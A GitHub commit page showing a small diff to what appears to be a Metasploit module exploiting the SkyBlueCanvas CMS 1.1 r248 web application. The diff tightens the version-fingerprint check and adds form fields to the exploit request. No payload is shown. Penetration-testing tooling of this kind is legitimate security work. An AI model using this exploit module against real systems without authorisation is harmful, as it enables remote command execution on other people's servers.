We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents 022ab74 + a7103f2 commit 90f0eecCopy full SHA for 90f0eec
modules/exploits/unix/webapp/skybluecanvas_exec.rb
@@ -65,7 +65,7 @@ def check
65
66
res = send_request_raw('uri' => uri)
67
68
- if res and res.body =~ /[1.1 r248]/
+ if res && res.body.include?('SkyBlueCanvas [1.1 r248]')
69
vprint_good("SkyBlueCanvas CMS 1.1 r248-xx found")
70
return Exploit::CheckCode::Appears
71
end
@@ -89,7 +89,9 @@ def exploit
89
'email' => rand_text_alphanumeric(10),
90
'subject' => rand_text_alphanumeric(10),
91
'message' => rand_text_alphanumeric(10),
92
- 'action' => 'Send'
+ 'action' => 'Send',
93
+ 'mailinglist' => '0',
94
+ 'cc' => '0'
95
}
96
})
97
0 commit comments